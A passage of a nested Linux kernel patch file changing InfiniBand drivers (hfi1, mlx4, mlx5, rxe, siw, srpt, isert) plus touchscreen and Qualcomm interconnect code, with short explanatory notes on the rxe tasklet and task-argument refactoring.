+ 	struct sdma_mmu_node *node =
+ 		container_of(mnode, struct sdma_mmu_node, rb);
+ 
+-	unpin_sdma_pages(node);
+-	kfree(node);
++	free_system_node(node);
+ }
+ 
+ static int sdma_rb_invalidate(void *arg, struct mmu_rb_node *mnode)
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.h b/drivers/infiniband/hw/hfi1/user_sdma.h
+index ea56eb57e6568..a241836371dc1 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.h
++++ b/drivers/infiniband/hw/hfi1/user_sdma.h
+@@ -112,16 +112,11 @@ struct sdma_mmu_node {
+ struct user_sdma_iovec {
+ 	struct list_head list;
+ 	struct iovec iov;
+-	/* number of pages in this vector */
+-	unsigned int npages;
+-	/* array of pinned pages for this vector */
+-	struct page **pages;
+ 	/*
+ 	 * offset into the virtual address space of the vector at
+ 	 * which we last left off.
+ 	 */
+ 	u64 offset;
+-	struct sdma_mmu_node *node;
+ };
+ 
+ /* evict operation argument */
+diff --git a/drivers/infiniband/hw/hfi1/verbs.c b/drivers/infiniband/hw/hfi1/verbs.c
+index e6e17984553c0..39ca32d9ae6a5 100644
+--- a/drivers/infiniband/hw/hfi1/verbs.c
++++ b/drivers/infiniband/hw/hfi1/verbs.c
+@@ -778,8 +778,8 @@ static int build_verbs_tx_desc(
+ 
+ 	/* add icrc, lt byte, and padding to flit */
+ 	if (extra_bytes)
+-		ret = sdma_txadd_daddr(sde->dd, &tx->txreq,
+-				       sde->dd->sdma_pad_phys, extra_bytes);
++		ret = sdma_txadd_daddr(sde->dd, &tx->txreq, sde->dd->sdma_pad_phys,
++				       extra_bytes);
+ 
+ bail_txadd:
+ 	return ret;
+diff --git a/drivers/infiniband/hw/hfi1/vnic_sdma.c b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+index c3f0f8d877c37..727eedfba332a 100644
+--- a/drivers/infiniband/hw/hfi1/vnic_sdma.c
++++ b/drivers/infiniband/hw/hfi1/vnic_sdma.c
+@@ -64,6 +64,7 @@ static noinline int build_vnic_ulp_payload(struct sdma_engine *sde,
+ 
+ 		/* combine physically continuous fragments later? */
+ 		ret = sdma_txadd_page(sde->dd,
++				      NULL,
+ 				      &tx->txreq,
+ 				      skb_frag_page(frag),
+ 				      skb_frag_off(frag),
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index b17d6ebc5b705..488c906c0432c 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -412,9 +412,13 @@ static int set_user_sq_size(struct mlx4_ib_dev *dev,
+ 			    struct mlx4_ib_qp *qp,
+ 			    struct mlx4_ib_create_qp *ucmd)
+ {
++	u32 cnt;
++
+ 	/* Sanity check SQ size before proceeding */
+-	if ((1 << ucmd->log_sq_bb_count) > dev->dev->caps.max_wqes	 ||
+-	    ucmd->log_sq_stride >
++	if (check_shl_overflow(1, ucmd->log_sq_bb_count, &cnt) ||
++	    cnt > dev->dev->caps.max_wqes)
++		return -EINVAL;
++	if (ucmd->log_sq_stride >
+ 		ilog2(roundup_pow_of_two(dev->dev->caps.max_sq_desc_sz)) ||
+ 	    ucmd->log_sq_stride < MLX4_IB_MIN_SQ_STRIDE)
+ 		return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index 2211a0be16f36..f8e2baed27a5c 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -666,7 +666,21 @@ static bool devx_is_valid_obj_id(struct uverbs_attr_bundle *attrs,
+ 				      obj_id;
+ 
+ 	case MLX5_IB_OBJECT_DEVX_OBJ:
+-		return ((struct devx_obj *)uobj->object)->obj_id == obj_id;
++	{
++		u16 opcode = MLX5_GET(general_obj_in_cmd_hdr, in, opcode);
++		struct devx_obj *devx_uobj = uobj->object;
++
++		if (opcode == MLX5_CMD_OP_QUERY_FLOW_COUNTER &&
++		    devx_uobj->flow_counter_bulk_size) {
++			u64 end;
++
++			end = devx_uobj->obj_id +
++				devx_uobj->flow_counter_bulk_size;
++			return devx_uobj->obj_id <= obj_id && end > obj_id;
++		}
++
++		return devx_uobj->obj_id == obj_id;
++	}
+ 
+ 	default:
+ 		return false;
+@@ -1517,10 +1531,17 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_DEVX_OBJ_CREATE)(
+ 		goto obj_free;
+ 
+ 	if (opcode == MLX5_CMD_OP_ALLOC_FLOW_COUNTER) {
+-		u8 bulk = MLX5_GET(alloc_flow_counter_in,
+-				   cmd_in,
+-				   flow_counter_bulk);
+-		obj->flow_counter_bulk_size = 128UL * bulk;
++		u32 bulk = MLX5_GET(alloc_flow_counter_in,
++				    cmd_in,
++				    flow_counter_bulk_log_size);
++
++		if (bulk)
++			bulk = 1 << bulk;
++		else
++			bulk = 128UL * MLX5_GET(alloc_flow_counter_in,
++						cmd_in,
++						flow_counter_bulk);
++		obj->flow_counter_bulk_size = bulk;
+ 	}
+ 
+ 	uobj->object = obj;
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index cf953d23d18da..f7d3643b08f50 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4408,7 +4408,7 @@ static int mlx5_ib_modify_dct(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			return -EINVAL;
+ 
+ 		if (attr->port_num == 0 ||
+-		    attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports)) {
++		    attr->port_num > dev->num_ports) {
+ 			mlx5_ib_dbg(dev, "invalid port number %d. number of ports is %d\n",
+ 				    attr->port_num, dev->num_ports);
+ 			return -EINVAL;
+diff --git a/drivers/infiniband/hw/mlx5/umr.c b/drivers/infiniband/hw/mlx5/umr.c
+index 029e9536ec28f..8b674514818a1 100644
+--- a/drivers/infiniband/hw/mlx5/umr.c
++++ b/drivers/infiniband/hw/mlx5/umr.c
+@@ -380,6 +380,9 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 				       struct mlx5_mkey_seg *seg,
+ 				       unsigned int access_flags)
+ {
++	bool ro_read = (access_flags & IB_ACCESS_RELAXED_ORDERING) &&
++		       pcie_relaxed_ordering_enabled(dev->mdev->pdev);
++
+ 	MLX5_SET(mkc, seg, a, !!(access_flags & IB_ACCESS_REMOTE_ATOMIC));
+ 	MLX5_SET(mkc, seg, rw, !!(access_flags & IB_ACCESS_REMOTE_WRITE));
+ 	MLX5_SET(mkc, seg, rr, !!(access_flags & IB_ACCESS_REMOTE_READ));
+@@ -387,8 +390,7 @@ static void mlx5r_umr_set_access_flags(struct mlx5_ib_dev *dev,
+ 	MLX5_SET(mkc, seg, lr, 1);
+ 	MLX5_SET(mkc, seg, relaxed_ordering_write,
+ 		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
+-	MLX5_SET(mkc, seg, relaxed_ordering_read,
+-		 !!(access_flags & IB_ACCESS_RELAXED_ORDERING));
++	MLX5_SET(mkc, seg, relaxed_ordering_read, ro_read);
+ }
+ 
+ int mlx5r_umr_rereg_pd_access(struct mlx5_ib_mr *mr, struct ib_pd *pd,
+diff --git a/drivers/infiniband/sw/rdmavt/qp.c b/drivers/infiniband/sw/rdmavt/qp.c
+index 3acab569fbb94..2bdc4486c3daa 100644
+--- a/drivers/infiniband/sw/rdmavt/qp.c
++++ b/drivers/infiniband/sw/rdmavt/qp.c
+@@ -464,8 +464,6 @@ void rvt_qp_exit(struct rvt_dev_info *rdi)
+ 	if (qps_inuse)
+ 		rvt_pr_err(rdi, "QP memory leak! %u still in use\n",
+ 			   qps_inuse);
+-	if (!rdi->qp_dev)
+-		return;
+ 
+ 	kfree(rdi->qp_dev->qp_table);
+ 	free_qpn_table(&rdi->qp_dev->qpn_table);
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index 136c2efe34660..a3f05fdd9fac2 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -175,7 +175,7 @@ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name)
+ 
+ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ {
+-	struct rxe_dev *exists;
++	struct rxe_dev *rxe;
+ 	int err = 0;
+ 
+ 	if (is_vlan_dev(ndev)) {
+@@ -184,17 +184,17 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 		goto err;
+ 	}
+ 
+-	exists = rxe_get_dev_from_net(ndev);
+-	if (exists) {
+-		ib_device_put(&exists->ib_dev);
+-		rxe_dbg(exists, "already configured on %s\n", ndev->name);
++	rxe = rxe_get_dev_from_net(ndev);
++	if (rxe) {
++		ib_device_put(&rxe->ib_dev);
++		rxe_dbg(rxe, "already configured on %s\n", ndev->name);
+ 		err = -EEXIST;
+ 		goto err;
+ 	}
+ 
+ 	err = rxe_net_add(ibdev_name, ndev);
+ 	if (err) {
+-		rxe_dbg(exists, "failed to add %s\n", ndev->name);
++		pr_debug("failed to add %s\n", ndev->name);
+ 		goto err;
+ 	}
+ err:
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index 20737fec392bf..9a9d3ec2bf2fd 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -571,9 +571,8 @@ static void free_pkt(struct rxe_pkt_info *pkt)
+ 	ib_device_put(dev);
+ }
+ 
+-int rxe_completer(void *arg)
++int rxe_completer(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	struct rxe_send_wqe *wqe = NULL;
+ 	struct sk_buff *skb = NULL;
+diff --git a/drivers/infiniband/sw/rxe/rxe_cq.c b/drivers/infiniband/sw/rxe/rxe_cq.c
+index 1df186534639a..faf49c50bbaba 100644
+--- a/drivers/infiniband/sw/rxe/rxe_cq.c
++++ b/drivers/infiniband/sw/rxe/rxe_cq.c
+@@ -39,21 +39,6 @@ err1:
+ 	return -EINVAL;
+ }
+ 
+-static void rxe_send_complete(struct tasklet_struct *t)
+-{
+-	struct rxe_cq *cq = from_tasklet(cq, t, comp_task);
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&cq->cq_lock, flags);
+-	if (cq->is_dying) {
+-		spin_unlock_irqrestore(&cq->cq_lock, flags);
+-		return;
+-	}
+-	spin_unlock_irqrestore(&cq->cq_lock, flags);
+-
+-	cq->ibcq.comp_handler(&cq->ibcq, cq->ibcq.cq_context);
+-}
+-
+ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 		     int comp_vector, struct ib_udata *udata,
+ 		     struct rxe_create_cq_resp __user *uresp)
+@@ -79,10 +64,6 @@ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 
+ 	cq->is_user = uresp;
+ 
+-	cq->is_dying = false;
+-
+-	tasklet_setup(&cq->comp_task, rxe_send_complete);
+-
+ 	spin_lock_init(&cq->cq_lock);
+ 	cq->ibcq.cqe = cqe;
+ 	return 0;
+@@ -103,6 +84,7 @@ int rxe_cq_resize_queue(struct rxe_cq *cq, int cqe,
+ 	return err;
+ }
+ 
++/* caller holds reference to cq */
+ int rxe_cq_post(struct rxe_cq *cq, struct rxe_cqe *cqe, int solicited)
+ {
+ 	struct ib_event ev;
+@@ -135,21 +117,13 @@ int rxe_cq_post(struct rxe_cq *cq, struct rxe_cqe *cqe, int solicited)
+ 	if ((cq->notify == IB_CQ_NEXT_COMP) ||
+ 	    (cq->notify == IB_CQ_SOLICITED && solicited)) {
+ 		cq->notify = 0;
+-		tasklet_schedule(&cq->comp_task);
++
++		cq->ibcq.comp_handler(&cq->ibcq, cq->ibcq.cq_context);
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-void rxe_cq_disable(struct rxe_cq *cq)
+-{
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&cq->cq_lock, flags);
+-	cq->is_dying = true;
+-	spin_unlock_irqrestore(&cq->cq_lock, flags);
+-}
+-
+ void rxe_cq_cleanup(struct rxe_pool_elem *elem)
+ {
+ 	struct rxe_cq *cq = container_of(elem, typeof(*cq), elem);
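The net effect of the rxe_cq.c changes is that completion delivery loses a level of deferral. The call path, before and after, using the names from the hunks:

	before:  rxe_cq_post() -> tasklet_schedule(&cq->comp_task)
	             -> rxe_send_complete() -> cq->ibcq.comp_handler(...)
	after:   rxe_cq_post() -> cq->ibcq.comp_handler(...)

The is_dying flag and rxe_cq_disable() existed only to stop a late-firing tasklet from touching a CQ under destruction; with the direct call there is no deferred work left to fence, so both can be removed (see the rxe_verbs.c and rxe_verbs.h hunks below).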
+diff --git a/drivers/infiniband/sw/rxe/rxe_loc.h b/drivers/infiniband/sw/rxe/rxe_loc.h
+index 1bb0cb479eb12..d131aaa94d059 100644
+--- a/drivers/infiniband/sw/rxe/rxe_loc.h
++++ b/drivers/infiniband/sw/rxe/rxe_loc.h
+@@ -171,9 +171,9 @@ void rxe_srq_cleanup(struct rxe_pool_elem *elem);
+ 
+ void rxe_dealloc(struct ib_device *ib_dev);
+ 
+-int rxe_completer(void *arg);
+-int rxe_requester(void *arg);
+-int rxe_responder(void *arg);
++int rxe_completer(struct rxe_qp *qp);
++int rxe_requester(struct rxe_qp *qp);
++int rxe_responder(struct rxe_qp *qp);
+ 
+ /* rxe_icrc.c */
+ int rxe_icrc_init(struct rxe_dev *rxe);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index ab72db68b58f6..13283ec06f95e 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -473,29 +473,23 @@ static void rxe_qp_reset(struct rxe_qp *qp)
+ {
+ 	/* stop tasks from running */
+ 	rxe_disable_task(&qp->resp.task);
+-
+-	/* stop request/comp */
+-	if (qp->sq.queue) {
+-		if (qp_type(qp) == IB_QPT_RC)
+-			rxe_disable_task(&qp->comp.task);
+-		rxe_disable_task(&qp->req.task);
+-	}
++	rxe_disable_task(&qp->comp.task);
++	rxe_disable_task(&qp->req.task);
+ 
+ 	/* move qp to the reset state */
+ 	qp->req.state = QP_STATE_RESET;
+ 	qp->comp.state = QP_STATE_RESET;
+ 	qp->resp.state = QP_STATE_RESET;
+ 
+-	/* let state machines reset themselves drain work and packet queues
+-	 * etc.
+-	 */
+-	__rxe_do_task(&qp->resp.task);
++	/* drain work and packet queues */
++	rxe_requester(qp);
++	rxe_completer(qp);
++	rxe_responder(qp);
+ 
+-	if (qp->sq.queue) {
+-		__rxe_do_task(&qp->comp.task);
+-		__rxe_do_task(&qp->req.task);
++	if (qp->rq.queue)
++		rxe_queue_reset(qp->rq.queue);
++	if (qp->sq.queue)
+ 		rxe_queue_reset(qp->sq.queue);
+-	}
+ 
+ 	/* cleanup attributes */
+ 	atomic_set(&qp->ssn, 0);
+@@ -518,13 +512,8 @@ static void rxe_qp_reset(struct rxe_qp *qp)
+ 
+ 	/* reenable tasks */
+ 	rxe_enable_task(&qp->resp.task);
+-
+-	if (qp->sq.queue) {
+-		if (qp_type(qp) == IB_QPT_RC)
+-			rxe_enable_task(&qp->comp.task);
+-
+-		rxe_enable_task(&qp->req.task);
+-	}
++	rxe_enable_task(&qp->comp.task);
++	rxe_enable_task(&qp->req.task);
+ }
+ 
+ /* drain the send queue */
+@@ -533,10 +522,7 @@ static void rxe_qp_drain(struct rxe_qp *qp)
+ 	if (qp->sq.queue) {
+ 		if (qp->req.state != QP_STATE_DRAINED) {
+ 			qp->req.state = QP_STATE_DRAIN;
+-			if (qp_type(qp) == IB_QPT_RC)
+-				rxe_sched_task(&qp->comp.task);
+-			else
+-				__rxe_do_task(&qp->comp.task);
++			rxe_sched_task(&qp->comp.task);
+ 			rxe_sched_task(&qp->req.task);
+ 		}
+ 	}
+@@ -552,11 +538,7 @@ void rxe_qp_error(struct rxe_qp *qp)
+ 
+ 	/* drain work and packet queues */
+ 	rxe_sched_task(&qp->resp.task);
+-
+-	if (qp_type(qp) == IB_QPT_RC)
+-		rxe_sched_task(&qp->comp.task);
+-	else
+-		__rxe_do_task(&qp->comp.task);
++	rxe_sched_task(&qp->comp.task);
+ 	rxe_sched_task(&qp->req.task);
+ }
+ 
+@@ -773,24 +755,25 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 
+ 	qp->valid = 0;
+ 	qp->qp_timeout_jiffies = 0;
+-	rxe_cleanup_task(&qp->resp.task);
+ 
+ 	if (qp_type(qp) == IB_QPT_RC) {
+ 		del_timer_sync(&qp->retrans_timer);
+ 		del_timer_sync(&qp->rnr_nak_timer);
+ 	}
+ 
+-	rxe_cleanup_task(&qp->req.task);
+-	rxe_cleanup_task(&qp->comp.task);
++	if (qp->resp.task.func)
++		rxe_cleanup_task(&qp->resp.task);
+ 
+-	/* flush out any receive wr's or pending requests */
+ 	if (qp->req.task.func)
+-		__rxe_do_task(&qp->req.task);
++		rxe_cleanup_task(&qp->req.task);
+ 
+-	if (qp->sq.queue) {
+-		__rxe_do_task(&qp->comp.task);
+-		__rxe_do_task(&qp->req.task);
+-	}
++	if (qp->comp.task.func)
++		rxe_cleanup_task(&qp->comp.task);
++
++	/* flush out any receive wr's or pending requests */
++	rxe_requester(qp);
++	rxe_completer(qp);
++	rxe_responder(qp);
+ 
+ 	if (qp->sq.queue)
+ 		rxe_queue_cleanup(qp->sq.queue);
+diff --git a/drivers/infiniband/sw/rxe/rxe_req.c b/drivers/infiniband/sw/rxe/rxe_req.c
+index 899c8779f8001..f2dc2d191e16f 100644
+--- a/drivers/infiniband/sw/rxe/rxe_req.c
++++ b/drivers/infiniband/sw/rxe/rxe_req.c
+@@ -635,9 +635,8 @@ static int rxe_do_local_ops(struct rxe_qp *qp, struct rxe_send_wqe *wqe)
+ 	return 0;
+ }
+ 
+-int rxe_requester(void *arg)
++int rxe_requester(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	struct rxe_pkt_info pkt;
+ 	struct sk_buff *skb;
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 0cc1ba91d48cc..8c68340502769 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -1439,9 +1439,8 @@ static void rxe_drain_req_pkts(struct rxe_qp *qp, bool notify)
+ 		queue_advance_consumer(q, q->type);
+ }
+ 
+-int rxe_responder(void *arg)
++int rxe_responder(struct rxe_qp *qp)
+ {
+-	struct rxe_qp *qp = (struct rxe_qp *)arg;
+ 	struct rxe_dev *rxe = to_rdev(qp->ibqp.device);
+ 	enum resp_states state;
+ 	struct rxe_pkt_info *pkt = NULL;
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index 60b90e33a8849..a67f485454436 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -6,19 +6,6 @@
+ 
+ #include "rxe.h"
+ 
+-int __rxe_do_task(struct rxe_task *task)
+-
+-{
+-	int ret;
+-
+-	while ((ret = task->func(task->arg)) == 0)
+-		;
+-
+-	task->ret = ret;
+-
+-	return ret;
+-}
+-
+ /*
+  * this locking is due to a potential race where
+  * a second caller finds the task already running
+@@ -29,7 +16,7 @@ static void do_task(struct tasklet_struct *t)
+ 	int cont;
+ 	int ret;
+ 	struct rxe_task *task = from_tasklet(task, t, tasklet);
+-	struct rxe_qp *qp = (struct rxe_qp *)task->arg;
++	struct rxe_qp *qp = task->qp;
+ 	unsigned int iterations = RXE_MAX_ITERATIONS;
+ 
+ 	spin_lock_bh(&task->lock);
+@@ -54,7 +41,7 @@ static void do_task(struct tasklet_struct *t)
+ 
+ 	do {
+ 		cont = 0;
+-		ret = task->func(task->arg);
++		ret = task->func(task->qp);
+ 
+ 		spin_lock_bh(&task->lock);
+ 		switch (task->state) {
+@@ -91,9 +78,10 @@ static void do_task(struct tasklet_struct *t)
+ 	task->ret = ret;
+ }
+ 
+-int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *))
++int rxe_init_task(struct rxe_task *task, struct rxe_qp *qp,
++		  int (*func)(struct rxe_qp *))
+ {
+-	task->arg	= arg;
++	task->qp	= qp;
+ 	task->func	= func;
+ 	task->destroyed	= false;
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index 7b88129702ac6..99585e40cef92 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -22,28 +22,23 @@ struct rxe_task {
+ 	struct tasklet_struct	tasklet;
+ 	int			state;
+ 	spinlock_t		lock;
+-	void			*arg;
+-	int			(*func)(void *arg);
++	struct rxe_qp		*qp;
++	int			(*func)(struct rxe_qp *qp);
+ 	int			ret;
+ 	bool			destroyed;
+ };
+ 
+ /*
+  * init rxe_task structure
+- *	arg  => parameter to pass to fcn
++ *	qp  => parameter to pass to func
+  *	func => function to call until it returns != 0
+  */
+-int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *));
++int rxe_init_task(struct rxe_task *task, struct rxe_qp *qp,
++		  int (*func)(struct rxe_qp *));
+ 
+ /* cleanup task */
+ void rxe_cleanup_task(struct rxe_task *task);
+ 
+-/*
+- * raw call to func in loop without any checking
+- * can call when tasklets are disabled
+- */
+-int __rxe_do_task(struct rxe_task *task);
+-
+ void rxe_run_task(struct rxe_task *task);
+ 
+ void rxe_sched_task(struct rxe_task *task);
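Replacing the void * argument with struct rxe_qp * turns a runtime convention into a compile-time check. A minimal sketch of the difference, using the signatures from these hunks:

	/* old: type erased, every handler casts blindly */
	int rxe_completer(void *arg)
	{
		struct rxe_qp *qp = (struct rxe_qp *)arg;	/* unchecked */
		...
	}

	/* new: the compiler rejects a mismatched argument */
	int rxe_completer(struct rxe_qp *qp);
	rxe_init_task(&qp->comp.task, qp, rxe_completer);

Dropping __rxe_do_task() is the other half of the cleanup: its raw call-in-a-loop bypassed the task state machine entirely, so the rxe_qp.c hunks above drain queues by invoking the typed handlers (rxe_requester() and friends) directly instead.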
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index a3aee247aa157..9ae7cf93365c7 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -786,8 +786,6 @@ static int rxe_destroy_cq(struct ib_cq *ibcq, struct ib_udata *udata)
+ 	if (atomic_read(&cq->num_wq))
+ 		return -EINVAL;
+ 
+-	rxe_cq_disable(cq);
+-
+ 	rxe_cleanup(cq);
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.h b/drivers/infiniband/sw/rxe/rxe_verbs.h
+index c269ae2a32243..d812093a39166 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.h
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.h
+@@ -63,9 +63,7 @@ struct rxe_cq {
+ 	struct rxe_queue	*queue;
+ 	spinlock_t		cq_lock;
+ 	u8			notify;
+-	bool			is_dying;
+ 	bool			is_user;
+-	struct tasklet_struct	comp_task;
+ 	atomic_t		num_wq;
+ };
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_main.c b/drivers/infiniband/sw/siw/siw_main.c
+index dacc174604bf2..65b5cda5457ba 100644
+--- a/drivers/infiniband/sw/siw/siw_main.c
++++ b/drivers/infiniband/sw/siw/siw_main.c
+@@ -437,9 +437,6 @@ static int siw_netdev_event(struct notifier_block *nb, unsigned long event,
+ 
+ 	dev_dbg(&netdev->dev, "siw: event %lu\n", event);
+ 
+-	if (dev_net(netdev) != &init_net)
+-		return NOTIFY_OK;
+-
+ 	base_dev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_SIW);
+ 	if (!base_dev)
+ 		return NOTIFY_OK;
+diff --git a/drivers/infiniband/sw/siw/siw_qp_tx.c b/drivers/infiniband/sw/siw/siw_qp_tx.c
+index 05052b49107f2..6bb9e9e81ff4c 100644
+--- a/drivers/infiniband/sw/siw/siw_qp_tx.c
++++ b/drivers/infiniband/sw/siw/siw_qp_tx.c
+@@ -558,7 +558,7 @@ static int siw_tx_hdt(struct siw_iwarp_tx *c_tx, struct socket *s)
+ 			data_len -= plen;
+ 			fp_off = 0;
+ 
+-			if (++seg > (int)MAX_ARRAY) {
++			if (++seg >= (int)MAX_ARRAY) {
+ 				siw_dbg_qp(tx_qp(c_tx), "too many fragments\n");
+ 				siw_unmap_pages(iov, kmap_mask, seg-1);
+ 				wqe->processed -= c_tx->bytes_unsent;
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index 75404885cf981..f290cd49698ea 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -2506,8 +2506,8 @@ isert_wait4cmds(struct iscsit_conn *conn)
+ 	isert_info("iscsit_conn %p\n", conn);
+ 
+ 	if (conn->sess) {
+-		target_stop_session(conn->sess->se_sess);
+-		target_wait_for_sess_cmds(conn->sess->se_sess);
++		target_stop_cmd_counter(conn->cmd_cnt);
++		target_wait_for_cmds(conn->cmd_cnt);
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 3c3fae738c3ed..25e799dba999e 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -549,6 +549,7 @@ static int srpt_format_guid(char *buf, unsigned int size, const __be64 *guid)
+  */
+ static int srpt_refresh_port(struct srpt_port *sport)
+ {
++	struct ib_mad_agent *mad_agent;
+ 	struct ib_mad_reg_req reg_req;
+ 	struct ib_port_modify port_modify;
+ 	struct ib_port_attr port_attr;
+@@ -593,24 +594,26 @@ static int srpt_refresh_port(struct srpt_port *sport)
+ 		set_bit(IB_MGMT_METHOD_GET, reg_req.method_mask);
+ 		set_bit(IB_MGMT_METHOD_SET, reg_req.method_mask);
+ 
+-		sport->mad_agent = ib_register_mad_agent(sport->sdev->device,
+-							 sport->port,
+-							 IB_QPT_GSI,
+-							 &reg_req, 0,
+-							 srpt_mad_send_handler,
+-							 srpt_mad_recv_handler,
+-							 sport, 0);
+-		if (IS_ERR(sport->mad_agent)) {
++		mad_agent = ib_register_mad_agent(sport->sdev->device,
++						  sport->port,
++						  IB_QPT_GSI,
++						  &reg_req, 0,
++						  srpt_mad_send_handler,
++						  srpt_mad_recv_handler,
++						  sport, 0);
++		if (IS_ERR(mad_agent)) {
+ 			pr_err("%s-%d: MAD agent registration failed (%ld). Note: this is expected if SR-IOV is enabled.\n",
+ 			       dev_name(&sport->sdev->device->dev), sport->port,
+-			       PTR_ERR(sport->mad_agent));
++			       PTR_ERR(mad_agent));
+ 			sport->mad_agent = NULL;
+ 			memset(&port_modify, 0, sizeof(port_modify));
+ 			port_modify.clr_port_cap_mask = IB_PORT_DEVICE_MGMT_SUP;
+ 			ib_modify_port(sport->sdev->device, sport->port, 0,
+ 				       &port_modify);
+-
++			return 0;
+ 		}
++
++		sport->mad_agent = mad_agent;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/input/touchscreen/raspberrypi-ts.c b/drivers/input/touchscreen/raspberrypi-ts.c
+index 5000f5fd9ec38..45c575df994e0 100644
+--- a/drivers/input/touchscreen/raspberrypi-ts.c
++++ b/drivers/input/touchscreen/raspberrypi-ts.c
+@@ -134,7 +134,7 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	fw = rpi_firmware_get(fw_node);
++	fw = devm_rpi_firmware_get(&pdev->dev, fw_node);
+ 	of_node_put(fw_node);
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+@@ -160,7 +160,6 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 	touchbuf = (u32)ts->fw_regs_phys;
+ 	error = rpi_firmware_property(fw, RPI_FIRMWARE_FRAMEBUFFER_SET_TOUCHBUF,
+ 				      &touchbuf, sizeof(touchbuf));
+-	rpi_firmware_put(fw);
+ 	if (error || touchbuf != 0) {
+ 		dev_warn(dev, "Failed to set touchbuf, %d\n", error);
+ 		return error;
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 4180a06681b2b..c80819557923e 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -11,7 +11,6 @@
+ #include <linux/of_device.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+-#include <linux/pm_domain.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+ 
+@@ -496,12 +495,6 @@ regmap_done:
+ 	if (ret)
+ 		return ret;
+ 
+-	if (desc->has_bus_pd) {
+-		ret = dev_pm_domain_attach(dev, true);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	provider = &qp->provider;
